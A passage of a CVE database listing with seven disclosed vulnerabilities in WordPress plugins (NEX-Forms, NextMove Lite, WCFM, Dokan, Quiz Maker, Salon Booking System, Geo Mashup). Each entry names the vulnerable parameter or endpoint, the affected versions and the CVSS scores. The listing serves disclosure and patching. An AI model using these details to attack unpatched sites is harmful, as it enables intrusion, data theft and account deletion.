- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| webaways | NEX-Forms – Ultimate Forms Plugin for WordPress |
Affected:
0 , ≤ 9.1.11
(semver)
|
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-5063",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-04T16:14:51.881123Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-04T17:51:02.708Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "NEX-Forms \u2013 Ultimate Forms Plugin for WordPress",
"vendor": "webaways",
"versions": [
{
"lessThanOrEqual": "9.1.11",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Naoya Takahashi"
}
],
"descriptions": [
{
"lang": "en",
"value": "The NEX-Forms \u2013 Ultimate Forms Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via POST parameter key names in the submit_nex_form() function in versions up to, and including, 9.1.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 7.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-03T04:25:49.917Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9bac82ee-55bf-4381-b441-115a675e4834?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/changeset/3513524/nex-forms-express-wp-form-builder"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-03-27T20:33:32.000Z",
"value": "Vendor Notified"
},
{
"lang": "en",
"time": "2026-05-02T15:41:51.000Z",
"value": "Disclosed"
}
],
"title": "NEX-Forms \u003c= 9.1.11 - Unauthenticated Stored Cross-Site Scripting via POST Parameter Key Names"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-5063",
"datePublished": "2026-05-03T04:25:49.917Z",
"dateReserved": "2026-03-27T20:10:36.015Z",
"dateUpdated": "2026-05-04T17:51:02.708Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-0703 (GCVE-0-2026-0703)
Vulnerability from cvelistv5 – Published: 2026-05-02 13:26 – Updated: 2026-05-04 17:13
VLAI?
Title
NextMove Lite - Thank You Page for WooCommerce <= 2.23.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'xlwcty_current_date' Shortcode
Summary
The NextMove Lite – Thank You Page for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'xlwcty_current_date' shortcode in all versions up to, and including, 2.23.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Severity ?
6.4 (Medium)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| xlplugins | NextMove Lite – Thank You Page for WooCommerce |
Affected:
0 , ≤ 2.23.0
(semver)
|
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-0703",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-04T17:13:00.242519Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-04T17:13:09.712Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "NextMove Lite \u2013 Thank You Page for WooCommerce",
"vendor": "xlplugins",
"versions": [
{
"lessThanOrEqual": "2.23.0",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Muhammad Yudha - DJ"
}
],
"descriptions": [
{
"lang": "en",
"value": "The NextMove Lite \u2013 Thank You Page for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin\u0027s \u0027xlwcty_current_date\u0027 shortcode in all versions up to, and including, 2.23.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-02T13:26:10.078Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a8eab201-04a5-43df-bb9b-2964c50a1833?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/browser/woo-thank-you-page-nextmove-lite/tags/2.23.0/merge-tags/xlwcty-shortcode-merge-tags.php#L79"
},
{
"url": "https://plugins.trac.wordpress.org/browser/woo-thank-you-page-nextmove-lite/tags/2.23.0/merge-tags/xlwcty-shortcode-merge-tags.php#L87"
},
{
"url": "https://plugins.trac.wordpress.org/changeset/3482613/"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-01-08T01:23:35.000Z",
"value": "Vendor Notified"
},
{
"lang": "en",
"time": "2026-05-01T00:00:00.000Z",
"value": "Disclosed"
}
],
"title": "NextMove Lite - Thank You Page for WooCommerce \u003c= 2.23.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via \u0027xlwcty_current_date\u0027 Shortcode"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-0703",
"datePublished": "2026-05-02T13:26:10.078Z",
"dateReserved": "2026-01-08T01:07:52.291Z",
"dateUpdated": "2026-05-04T17:13:09.712Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-2554 (GCVE-0-2026-2554)
Vulnerability from cvelistv5 – Published: 2026-05-02 13:26 – Updated: 2026-05-05 00:28
VLAI?
Title
WCFM – Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible <= 6.7.25 - Authenticated (Vendor+) Insecure Direct Object Reference to Arbitrary User Deletion
Summary
The WCFM – Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.7.25 via the 'wcfm_delete_wcfm_customer' due to missing validation on the 'customerid' user controlled key. This makes it possible for authenticated attackers, with Vendor-level access and above, to delete arbitrary users, including Administrators.
Severity ?
8.1 (High)
CWE
- CWE-639 - Authorization Bypass Through User-Controlled Key
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| wclovers | WCFM – Frontend Manager for WooCommerce |
Affected:
0 , ≤ 6.7.25
(semver)
|
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-2554",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-05T00:27:51.784740Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T00:28:04.886Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "WCFM \u2013 Frontend Manager for WooCommerce",
"vendor": "wclovers",
"versions": [
{
"lessThanOrEqual": "6.7.25",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Supakiad S."
}
],
"descriptions": [
{
"lang": "en",
"value": "The WCFM \u2013 Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.7.25 via the \u0027wcfm_delete_wcfm_customer\u0027 due to missing validation on the \u0027customerid\u0027 user controlled key. This makes it possible for authenticated attackers, with Vendor-level access and above, to delete arbitrary users, including Administrators."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-639",
"description": "CWE-639 Authorization Bypass Through User-Controlled Key",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-02T13:26:09.653Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/21e397a4-0b32-4b13-a46b-c465acea0796?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/browser/wc-frontend-manager/tags/6.7.24/core/class-wcfm-customer.php#L386"
},
{
"url": "https://plugins.trac.wordpress.org/changeset/3483695/"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-02-15T17:35:31.000Z",
"value": "Vendor Notified"
},
{
"lang": "en",
"time": "2026-05-01T00:00:00.000Z",
"value": "Disclosed"
}
],
"title": "WCFM \u2013 Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible \u003c= 6.7.25 - Authenticated (Vendor+) Insecure Direct Object Reference to Arbitrary User Deletion"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-2554",
"datePublished": "2026-05-02T13:26:09.653Z",
"dateReserved": "2026-02-15T17:16:55.850Z",
"dateUpdated": "2026-05-05T00:28:04.886Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-3504 (GCVE-0-2026-3504)
Vulnerability from cvelistv5 – Published: 2026-05-02 13:26 – Updated: 2026-05-04 14:18
VLAI?
Title
Dokan: AI Powered WooCommerce Multivendor Marketplace Solution <= 4.3.1 - Unauthenticated Information Disclosure in Store Reviews REST API Endpoint
Summary
The Dokan: AI Powered WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.1 via the '/dokan/v1/stores/{id}/reviews' REST API endpoint. This is due to the 'prepare_reviews_for_response' method including reviewer email addresses, usernames, and user IDs in the API response. This makes it possible for unauthenticated attackers to extract email addresses, usernames, and user IDs of all customers who left reviews on any vendor's store. The Pro version of the plugin must be installed and activated, with store reviews enabled, in order to exploit the vulnerability.
Severity ?
5.3 (Medium)
CWE
- CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| dokaninc | Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy |
Affected:
0 , ≤ 4.3.1
(semver)
|
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-3504",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-04T14:18:11.287105Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-04T14:18:51.266Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Dokan: AI Powered WooCommerce Multivendor Marketplace Solution \u2013 Build Your Own Amazon, eBay, Etsy",
"vendor": "dokaninc",
"versions": [
{
"lessThanOrEqual": "4.3.1",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Rafshanzani Suhada"
}
],
"descriptions": [
{
"lang": "en",
"value": "The Dokan: AI Powered WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.1 via the \u0027/dokan/v1/stores/{id}/reviews\u0027 REST API endpoint. This is due to the \u0027prepare_reviews_for_response\u0027 method including reviewer email addresses, usernames, and user IDs in the API response. This makes it possible for unauthenticated attackers to extract email addresses, usernames, and user IDs of all customers who left reviews on any vendor\u0027s store. The Pro version of the plugin must be installed and activated, with store reviews enabled, in order to exploit the vulnerability."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-200",
"description": "CWE-200 Exposure of Sensitive Information to an Unauthorized Actor",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-02T13:26:09.111Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/02b0d7d7-8a10-48de-b1e1-7e1f1fda6ffe?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/browser/dokan-lite/trunk/includes/REST/StoreController.php#L125"
},
{
"url": "https://plugins.trac.wordpress.org/browser/dokan-lite/trunk/includes/REST/StoreController.php#L835"
},
{
"url": "https://plugins.trac.wordpress.org/browser/dokan-lite/trunk/includes/REST/StoreController.php#L854"
},
{
"url": "https://plugins.trac.wordpress.org/changeset/3481799/"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-03-04T00:55:47.000Z",
"value": "Vendor Notified"
},
{
"lang": "en",
"time": "2026-05-01T00:00:00.000Z",
"value": "Disclosed"
}
],
"title": "Dokan: AI Powered WooCommerce Multivendor Marketplace Solution \u003c= 4.3.1 - Unauthenticated Information Disclosure in Store Reviews REST API Endpoint"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-3504",
"datePublished": "2026-05-02T13:26:09.111Z",
"dateReserved": "2026-03-04T00:40:30.086Z",
"dateUpdated": "2026-05-04T14:18:51.266Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-6817 (GCVE-0-2026-6817)
Vulnerability from cvelistv5 – Published: 2026-05-02 11:16 – Updated: 2026-05-04 13:13
VLAI?
Title
Quiz Maker by AYS <= 6.7.1.29 - Unauthenticated Stored Cross-Site Scripting via 'rate_reason'
Summary
The Quiz Maker by AYS plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rate_reason' parameter in all versions up to, and including, 6.7.1.29 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Severity ?
5.8 (Medium)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ays-pro | Quiz Maker by AYS |
Affected:
0 , ≤ 6.7.1.29
(semver)
|
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-6817",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-04T13:13:36.072029Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-04T13:13:42.636Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Quiz Maker by AYS",
"vendor": "ays-pro",
"versions": [
{
"lessThanOrEqual": "6.7.1.29",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "CHOIGYEONGMIN"
}
],
"descriptions": [
{
"lang": "en",
"value": "The Quiz Maker by AYS plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u0027rate_reason\u0027 parameter in all versions up to, and including, 6.7.1.29 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-02T11:16:11.734Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fa995fa9-5fb1-434a-bf88-c60e986c45eb?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/changeset/3513370/quiz-maker"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-04-21T19:28:02.000Z",
"value": "Vendor Notified"
},
{
"lang": "en",
"time": "2026-05-01T21:36:24.000Z",
"value": "Disclosed"
}
],
"title": "Quiz Maker by AYS \u003c= 6.7.1.29 - Unauthenticated Stored Cross-Site Scripting via \u0027rate_reason\u0027"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-6817",
"datePublished": "2026-05-02T11:16:11.734Z",
"dateReserved": "2026-04-21T19:12:46.602Z",
"dateUpdated": "2026-05-04T13:13:42.636Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-6320 (GCVE-0-2026-6320)
Vulnerability from cvelistv5 – Published: 2026-05-02 11:16 – Updated: 2026-05-04 15:37
VLAI?
Title
Salon Booking System – Free Version <= 10.30.25 - Unauthenticated Arbitrary File Read via Booking File Field Path Traversal
Summary
The Salon Booking System – Free Version plugin for WordPress is vulnerable to Arbitrary File Read in versions up to, and including, 10.30.25. This is due to the public booking flow accepting attacker-controlled file-field values and later using those stored values as trusted paths for email attachments. This makes it possible for unauthenticated attackers to read arbitrary local files and exfiltrate them via booking confirmation email attachments.
Severity ?
7.5 (High)
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| wordpresschef | Salon Booking System – Free Version |
Affected:
0 , ≤ 10.30.25
(semver)
|
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-6320",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-04T15:34:22.000373Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-04T15:37:04.821Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Salon Booking System \u2013 Free Version",
"vendor": "wordpresschef",
"versions": [
{
"lessThanOrEqual": "10.30.25",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "daroo"
}
],
"descriptions": [
{
"lang": "en",
"value": "The Salon Booking System \u2013 Free Version plugin for WordPress is vulnerable to Arbitrary File Read in versions up to, and including, 10.30.25. This is due to the public booking flow accepting attacker-controlled file-field values and later using those stored values as trusted paths for email attachments. This makes it possible for unauthenticated attackers to read arbitrary local files and exfiltrate them via booking confirmation email attachments."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-02T11:16:11.330Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e91b8082-e1c7-4989-82db-20e255b52854?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/changeset/3512110/salon-booking-system"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-05-01T21:28:03.000Z",
"value": "Disclosed"
}
],
"title": "Salon Booking System \u2013 Free Version \u003c= 10.30.25 - Unauthenticated Arbitrary File Read via Booking File Field Path Traversal"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-6320",
"datePublished": "2026-05-02T11:16:11.330Z",
"dateReserved": "2026-04-14T20:18:15.555Z",
"dateUpdated": "2026-05-04T15:37:04.821Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-4061 (GCVE-0-2026-4061)
Vulnerability from cvelistv5 – Published: 2026-05-02 11:16 – Updated: 2026-05-04 14:58
VLAI?
Title
Geo Mashup <= 1.13.18 - Unauthenticated Time-Based SQL Injection via 'map_post_type' Parameter
Summary
The Geo Mashup plugin for WordPress is vulnerable to Time-Based SQL Injection via the 'map_post_type' parameter in all versions up to, and including, 1.13.18. This is due to the `SearchResults` hook explicitly calling `stripslashes_deep($_POST)` which removes WordPress magic quotes protection, followed by the unsanitized `map_post_type` value being concatenated into an `IN(...)` clause without `esc_sql()` or `$wpdb->prepare()`. The 'any' branch of the same code correctly applies `array_map('esc_sql', ...)`, but the else branch does not. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database via a time-based blind approach. Exploitation requires the Geo Search feature to be enabled in plugin settings.
Severity ?
7.5 (High)
CWE
- CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| cyberhobo | Geo Mashup |
Affected:
0 , ≤ 1.13.18
(semver)
|
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-4061",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-04T14:58:03.561286Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-04T14:58:15.863Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Geo Mashup",
"vendor": "cyberhobo",
"versions": [
{
"lessThanOrEqual": "1.13.18",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Naoya Takahashi"
}
],
"descriptions": [
{
"lang": "en",
"value": "The Geo Mashup plugin for WordPress is vulnerable to Time-Based SQL Injection via the \u0027map_post_type\u0027 parameter in all versions up to, and including, 1.13.18. This is due to the `SearchResults` hook explicitly calling `stripslashes_deep($_POST)` which removes WordPress magic quotes protection, followed by the unsanitized `map_post_type` value being concatenated into an `IN(...)` clause without `esc_sql()` or `$wpdb-\u003eprepare()`. The \u0027any\u0027 branch of the same code correctly applies `array_map(\u0027esc_sql\u0027, ...)`, but the else branch does not. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database via a time-based blind approach. Exploitation requires the Geo Search feature to be enabled in plugin settings."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89 Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-02T11:16:10.948Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cc3cf6c5-643e-49ca-b09c-bd7cfec328ee?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/geo-mashup-db.php#L1748"
},
{
"url": "https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/php/Hooks/SearchResults.php#L39"
},
{
"url": "https://plugins.trac.wordpress.org/browser/geo-mashup/trunk/php/Search.php#L152"
},
{
"url": "https://plugins.trac.wordpress.org/changeset/3503627/"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-03-12T17:48:47.000Z",
"value": "Vendor Notified"
},
{
"lang": "en",
"time": "2026-05-01T00:00:00.000Z",
"value": "Disclosed"
}
],
"title": "Geo Mashup \u003c= 1.13.18 - Unauthenticated Time-Based SQL Injection via \u0027map_post_type\u0027 Parameter"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-4061",
"datePublished": "2026-05-02T11:16:10.948Z",
"dateReserved": "2026-03-12T17:28:38.631Z",
"dateUpdated": "2026-05-04T14:58:15.863Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}